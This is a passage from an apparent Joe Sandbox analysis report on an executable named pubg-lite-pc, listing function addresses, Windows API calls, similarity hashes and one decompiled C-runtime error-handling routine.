                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: InfoQuerySystemVirtual
                                                                                                • String ID: D
                                                                                                • API String ID: 401686933-2746444292
                                                                                                • Opcode ID: 5bdbad35ce51fd88ab2f9bf2e79a589ef4280bd5891cb703bb6675c73a70bdf2
                                                                                                • Instruction ID: 5e81f70baf8147b0370693b9e206bd7484a2b38fe60cbba60d5ea8f550c927f1
                                                                                                • Opcode Fuzzy Hash: 5bdbad35ce51fd88ab2f9bf2e79a589ef4280bd5891cb703bb6675c73a70bdf2
                                                                                                • Instruction Fuzzy Hash: 8901DF36700109ABCF14DF64DC05FDE7BAAEBD4324F08C221AD59DA244DA34E9028B80
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00940C60 Relevance: 5.2, APIs: 3, Instructions: 742COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00940E0E
                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0094104B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeString
                                                                                                • String ID:
                                                                                                • API String ID: 3341692771-0
                                                                                                • Opcode ID: e6a298b94264b5a85af00857529b1631537a87205a30a9ec0865f3db3a6c6da2
                                                                                                • Instruction ID: d1ee5e073efee3a593a74567d585846515182553bc5d24216ffca0401e496927
                                                                                                • Opcode Fuzzy Hash: e6a298b94264b5a85af00857529b1631537a87205a30a9ec0865f3db3a6c6da2
                                                                                                • Instruction Fuzzy Hash: F052AD31D00248DFCB10DFA8C944BDEBBB9FF98314F544259E414E7291EB78AA45CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009725C0 Relevance: 4.8, APIs: 3, Instructions: 283windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,00001127,00000001,0000F000), ref: 009725E2
                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?), ref: 009727CB
                                                                                                • SendMessageW.USER32(?,0000110B,00000009,00000001), ref: 0097286E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$InvalidateRect
                                                                                                • String ID:
                                                                                                • API String ID: 2778011698-0
                                                                                                • Opcode ID: d9a7affac82923d8e7f4b5005a715c479b53dcb472a8c58e16e0d6926da790d0
                                                                                                • Instruction ID: 6373446d371165c9765dd8267d126bd2d23f3e1d306ca6ace4bb6218487ca3ea
                                                                                                • Opcode Fuzzy Hash: d9a7affac82923d8e7f4b5005a715c479b53dcb472a8c58e16e0d6926da790d0
                                                                                                • Instruction Fuzzy Hash: A2A10F32A14346AFD718CF68C985BAAFBE5FF88304F10861DF5599B290DB70E944CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00937170 Relevance: 4.6, APIs: 3, Instructions: 93COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • IsWindow.USER32(00000004), ref: 009371BE
                                                                                                • GetWindowLongW.USER32(00000004,000000FC), ref: 009371D7
                                                                                                • SetWindowLongW.USER32(00000004,000000FC,?), ref: 009371E9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Long
                                                                                                • String ID:
                                                                                                • API String ID: 847901565-0
                                                                                                • Opcode ID: 20e14a95d3e65722204eea57b0b1dfdf97ae286ed77d78d5a4afb314dd98713d
                                                                                                • Instruction ID: 247dc45dd1f24da5bb829427c03877981e1507f0feeb83362a39ea0b5624f29d
                                                                                                • Opcode Fuzzy Hash: 20e14a95d3e65722204eea57b0b1dfdf97ae286ed77d78d5a4afb314dd98713d
                                                                                                • Instruction Fuzzy Hash: 4E416BB0605746EFDB20CFA5C909B5AFBF9FF05314F104269E42497A90DBB6E918CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0093A160 Relevance: 4.6, APIs: 3, Instructions: 87COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetWindowLongW.USER32(00000003,000000FC), ref: 0093A1B6
                                                                                                • SetWindowLongW.USER32(00000003,000000FC,?), ref: 0093A1C8
                                                                                                • DeleteCriticalSection.KERNEL32(?,F4D3B90A,?,?,?,?,00A69334,000000FF), ref: 0093A1F3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: LongWindow$CriticalDeleteSection
                                                                                                • String ID:
                                                                                                • API String ID: 1978754570-0
                                                                                                • Opcode ID: d3a3ad72066de5f226ce1df9355f54a9680c2a96941681c8312218147442de48
                                                                                                • Instruction ID: 521cd7ef3563d7d03cae60901cc0a064c1cd7a3ae38ece8875618f0f75e3ff30
                                                                                                • Opcode Fuzzy Hash: d3a3ad72066de5f226ce1df9355f54a9680c2a96941681c8312218147442de48
                                                                                                • Instruction Fuzzy Hash: 6931D071A04646BBCB10CF68CD08B5AFFB8FF15310F144219E864932D1DB71EA15CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00A4A063 Relevance: 4.6, APIs: 3, Instructions: 77COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00A4A15B
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00A4A165
                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00A4A172
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                • String ID:
                                                                                                • API String ID: 3906539128-0
                                                                                                • Opcode ID: b177170e4db439a2b3e657640900261ddb50422af964a20f055d90a272c349d4
                                                                                                • Instruction ID: 6bc687a5c1723d70ac8bf2b5cffd1e8f79092343967854aa3e0499563cb3f44d
                                                                                                • Opcode Fuzzy Hash: b177170e4db439a2b3e657640900261ddb50422af964a20f055d90a272c349d4
                                                                                                • Instruction Fuzzy Hash: 4E31C574941218ABCB21DF68D9897DCBBB8BF58310F5042DAE41CA7291EB709F858F45
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6D98E9D3 Relevance: 4.6, APIs: 3, Instructions: 77COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 79%
                                                                                                			E6D98E9D3(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4, char _a8, char _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				signed int _t40;
				char* _t47;
				intOrPtr _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t69;
				signed int _t70;

				_t69 = __esi;
				_t67 = __edi;
				_t66 = __edx;
				_t61 = __ebx;
				_t40 =  *0x6d9e5024; // 0xe85bfa76
				_t41 = _t40 ^ _t70;
				_v8 = _t40 ^ _t70;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E6D98AFD8(_t41);
					_pop(_t62);
				}
				L6D98C450(_t67,  &_v804, 0, 0x50);
				L6D98C450(_t67,  &_v724, 0, 0x2cc);
				_v812 =  &_v804;
				_t47 =  &_v724;
				_v808 = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t69;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_t23 =  &_v0; // 0xf4458d6d
				_v540 =  *_t23;
				_t25 =  &_v0; // 0x6d988a0b
				_t49 = _t25;
				_v528 = _t49;
				_v724 = 0x10001;
				_t28 = _t49 - 4; // 0x9e30ac68
				_v544 =  *_t28;
				_t30 =  &_a8; // 0x55cc0000
				_v804 =  *_t30;
				_t32 =  &_a12; // 0xec83ec8b
				_v800 =  *_t32;
				_t34 =  &_v0; // 0xf4458d6d
				_v792 =  *_t34;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t36 =  &_v812; // 0x6d9886df
				if(UnhandledExceptionFilter(_t36) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_t38 =  &_a4; // 0x3b95e850
					_push( *_t38);
					E6D98AFD8(_t57);
				}
				_t39 =  &_v8; // 0xffffff01
				return L6D98A13F( *_t39 ^ _t70);
			}





































                                                                                                0x6d98e9d3
                                                                                                0x6d98e9d3
                                                                                                0x6d98e9d3
                                                                                                0x6d98e9d3
                                                                                                0x6d98e9de
                                                                                                0x6d98e9e3
                                                                                                0x6d98e9e5
                                                                                                0x6d98e9ed
                                                                                                0x6d98e9ef
                                                                                                0x6d98e9f2
                                                                                                0x6d98e9f7
                                                                                                0x6d98e9f7
                                                                                                0x6d98ea03
                                                                                                0x6d98ea16
                                                                                                0x6d98ea24
                                                                                                0x6d98ea2a
                                                                                                0x6d98ea30
                                                                                                0x6d98ea36
                                                                                                0x6d98ea3c
                                                                                                0x6d98ea42
                                                                                                0x6d98ea48
                                                                                                0x6d98ea4e
                                                                                                0x6d98ea54
                                                                                                0x6d98ea5a
                                                                                                0x6d98ea61
                                                                                                0x6d98ea68
                                                                                                0x6d98ea6f
                                                                                                0x6d98ea76
                                                                                                0x6d98ea7d
                                                                                                0x6d98ea84
                                                                                                0x6d98ea85
                                                                                                0x6d98ea8b
                                                                                                0x6d98ea8e
                                                                                                0x6d98ea94
                                                                                                0x6d98ea94
                                                                                                0x6d98ea97
                                                                                                0x6d98ea9d
                                                                                                0x6d98eaa7
                                                                                                0x6d98eaaa
                                                                                                0x6d98eab0
                                                                                                0x6d98eab3
                                                                                                0x6d98eab9
                                                                                                0x6d98eabc
                                                                                                0x6d98eac2
                                                                                                0x6d98eac5
                                                                                                0x6d98ead3
                                                                                                0x6d98ead5
                                                                                                0x6d98eadb
                                                                                                0x6d98eaea
                                                                                                0x6d98eaf6
                                                                                                0x6d98eaf6
                                                                                                0x6d98eaf9
                                                                                                0x6d98eafe
                                                                                                0x6d98eaff
                                                                                                0x6d98eb0b

                                                                                                APIs
                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000001), ref: 6D98EACB
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 6D98EAD5
                                                                                                • UnhandledExceptionFilter.KERNEL32(6D9886DF,?,?,?,?,?,00000001), ref: 6D98EAE2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66249601423.000000006D941000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D940000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66249463542.000000006D940000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66254569554.000000006D9BB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256348275.000000006D9E5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256907548.000000006D9F1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6d940000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                • String ID:
                                                                                                • API String ID: 3906539128-0
                                                                                                • Opcode ID: 9b647ffe1ece440aea906cd888cb9223c70a997afb3658cc5c22a980a4bb3a8b
                                                                                                • Instruction ID: 9b9b5c1d33a80e02481c9a4278cf33bb0548558e400afc0759404c8875d19e7e
                                                                                                • Opcode Fuzzy Hash: 9b647ffe1ece440aea906cd888cb9223c70a997afb3658cc5c22a980a4bb3a8b
                                                                                                • Instruction Fuzzy Hash: 633104B590522D9BCB21DF24D888B9DBBB8BF08714F5045EAE41CA7291EB709F818F44
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00935230 Relevance: 4.6, APIs: 3, Instructions: 64COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadResource.KERNEL32(00000000,00000000,F4D3B90A,00000001,00000000,?,00000000,00A65780,000000FF,?,009351DC,00000000,?,?,\\.\pipe\ToServer,00A684E0), ref: 0093525B
                                                                                                • LockResource.KERNEL32(00000000,?,009351DC,00000000,?,?,\\.\pipe\ToServer,00A684E0,000000FF,?,00935380,?,000000FF,?,009EB3FB,\\.\pipe\ToServer), ref: 00935266
                                                                                                • SizeofResource.KERNEL32(00000000,00000000,?,009351DC,00000000,?,?,\\.\pipe\ToServer,00A684E0,000000FF,?,00935380,?,000000FF,?,009EB3FB), ref: 00935274
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Resource$LoadLockSizeof
                                                                                                • String ID:
                                                                                                • API String ID: 2853612939-0
                                                                                                • Opcode ID: deeb19e58374d50288e9b52461c8772b1ad2bdaeb9f7d7309b381b2a088eda18
                                                                                                • Instruction ID: c554028cb067ce1bacd636634df2c71e9fe92f966439fcac05c462f4af19e428
                                                                                                • Opcode Fuzzy Hash: deeb19e58374d50288e9b52461c8772b1ad2bdaeb9f7d7309b381b2a088eda18
                                                                                                • Instruction Fuzzy Hash: 8B119132B05A14AFC725CF99D845B77B7ECE789711F05092AEC2AD7240FA759C008A90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0092FEF0 Relevance: 4.5, APIs: 3, Instructions: 28COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetWindowLongW.USER32(?,000000FC), ref: 0092FF09
                                                                                                • SetWindowLongW.USER32(?,000000FC,?), ref: 0092FF17
                                                                                                • DestroyWindow.USER32(?,?,?,?,?,?,80004003,?,00000001,?,?,00000001,?,?,00AA9A20), ref: 0092FF43
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Long$Destroy
                                                                                                • String ID:
                                                                                                • API String ID: 3055081903-0
                                                                                                • Opcode ID: 319974dabe6485d37eaaa5a5858ef3fd1d6e39c4158cbd5c414719dbf02276f4
                                                                                                • Instruction ID: 028ae1c242e167d204b0b38a8b486d1fe21500084b6e4d0aeabb59b35c804f68
                                                                                                • Opcode Fuzzy Hash: 319974dabe6485d37eaaa5a5858ef3fd1d6e39c4158cbd5c414719dbf02276f4
                                                                                                • Instruction Fuzzy Hash: 2CF03A31104B219BDB705F29FE08B83BBE5BF05721B044B68E9AA825E0DB30E848DB00
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00A54D1F Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(?,?,00A54D1E,?,?,?,?), ref: 00A54D41
                                                                                                • TerminateProcess.KERNEL32(00000000,?,00A54D1E,?,?,?,?), ref: 00A54D48
                                                                                                • ExitProcess.KERNEL32 ref: 00A54D5A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                • String ID:
                                                                                                • API String ID: 1703294689-0
                                                                                                • Opcode ID: 8a341d44bf05c3b2ece743781bd5cce86a8c814958b62efbbc9da9878709fb9b
                                                                                                • Instruction ID: eae3f146914ea42a981a08f66d398d9b0dc49f01fec534e599b073fd103fcf8e
                                                                                                • Opcode Fuzzy Hash: 8a341d44bf05c3b2ece743781bd5cce86a8c814958b62efbbc9da9878709fb9b
                                                                                                • Instruction Fuzzy Hash: 0BE0B632100108FFCF21EB94DE49E593B79FB58746B144515F9058A132CF79ED86CA80
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009D0F10 Relevance: 3.4, APIs: 2, Instructions: 374COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: HeapProcess
                                                                                                • String ID:
                                                                                                • API String ID: 54951025-0
                                                                                                • Opcode ID: b0c3908a9f1bc1ed48507267b65453b8a5bd5423ed710d35b97df4d145ce33db
                                                                                                • Instruction ID: 536c8c162690df48cb0f8f922fb5b220f24c19a41b0d861e68e6f9d9b5f55ec3
                                                                                                • Opcode Fuzzy Hash: b0c3908a9f1bc1ed48507267b65453b8a5bd5423ed710d35b97df4d145ce33db
                                                                                                • Instruction Fuzzy Hash: 28E1B131A41649EFDB10DFA8C884BAEF7F4FF45310F14826AE515AB391EB34A905CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009448F0 Relevance: 3.2, APIs: 2, Instructions: 249windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,0000102B,00000000,?), ref: 009449DB
                                                                                                • SendMessageW.USER32(?,0000102B,0000009B,?), ref: 00944BF2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 3850602802-0
                                                                                                • Opcode ID: c6520de2c831d79ef64b10ae1a1caf4ba921953e849596cb61c4f37a8567b7a0
                                                                                                • Instruction ID: f7d2fd1b624b1be515089baaf41004a97b3f9e792b15bd320658e88025ec99b9
                                                                                                • Opcode Fuzzy Hash: c6520de2c831d79ef64b10ae1a1caf4ba921953e849596cb61c4f37a8567b7a0
                                                                                                • Instruction Fuzzy Hash: 98A1D071A0160AAFCB18CF64C9D5FEAFBB5FF19300F158269E8599B281D734E940CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009B2ED0 Relevance: 3.1, APIs: 2, Instructions: 128COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5f951fc5c2003408629553f9f09d962b16ea0464dd633423e8611b3b0388c434
                                                                                                • Instruction ID: 10edf07c95b4542ed0ea119ecec65fd8ef092fc1dc538e780c8f7d146bc2c95f
                                                                                                • Opcode Fuzzy Hash: 5f951fc5c2003408629553f9f09d962b16ea0464dd633423e8611b3b0388c434
